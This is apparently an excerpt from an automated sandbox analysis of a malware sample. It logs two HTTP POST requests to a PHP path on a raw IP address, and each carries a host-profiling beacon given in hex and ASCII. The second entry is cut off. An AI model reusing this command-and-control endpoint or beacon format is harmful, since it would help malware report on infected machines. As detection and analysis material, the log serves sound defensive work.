                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&a